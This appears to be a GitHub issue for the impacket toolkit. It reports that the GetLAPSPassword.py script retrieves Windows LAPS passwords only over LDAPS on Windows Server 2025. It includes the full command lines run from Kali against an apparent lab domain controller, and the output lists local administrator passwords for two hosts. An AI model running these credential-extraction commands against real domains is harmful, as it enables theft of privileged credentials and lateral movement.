Open
Description
Configuration
impacket version: v0.12.0
Python version: 3.12.8
Target OS: Windows Server 2025 Datacenter
Attacking OS: Kali
Debug Output With Command String
┌──(kali㉿kali)-[~/tools/impacket/examples]
└─$ ./GetLAPSPassword.py -dc-ip 192.168.116.131 'juicy.local/account_reader:P@ssw0rd' -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Connecting to 192.168.116.131, port 389, SSL False
[+] Total of records returned 5
[-] No LAPS data returned
┌──(kali㉿kali)-[~/tools/impacket/examples]
└─$ ./GetLAPSPassword.py -dc-ip 192.168.116.131 'juicy.local/account_reader:P@ssw0rd' -debug -ldaps
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Connecting to 192.168.116.131, port 636, SSL True
[+] Total of records returned 5
[+] Connecting to ncacn_ip_tcp:192.168.116.131[49689]
[+] Connected
[+] Successfully bound
[+] Calling MS-GKDI GetKey
Host LAPS Username LAPS Password LAPS Password Expiration LAPSv2
---------- ------------- -------------- ------------------------ ------
ADCS-2025$ laps_admin hp$R/UVbP}6t5r 2025-02-20 14:52:44 True
WKSTN1$ laps_admin S(X9m@2X+-M1H; 2025-02-20 14:15:54 True
Additional context
I suspect Microsoft added some security measure that only allows LAPS password retrieval over LDAPS. I slightly modified the example script to have a switch to default to LDAPS just to demonstrate the issue. I believe this issue is the same on the latest dev version of impacket.
Metadata
Metadata
Assignees
Labels
No labels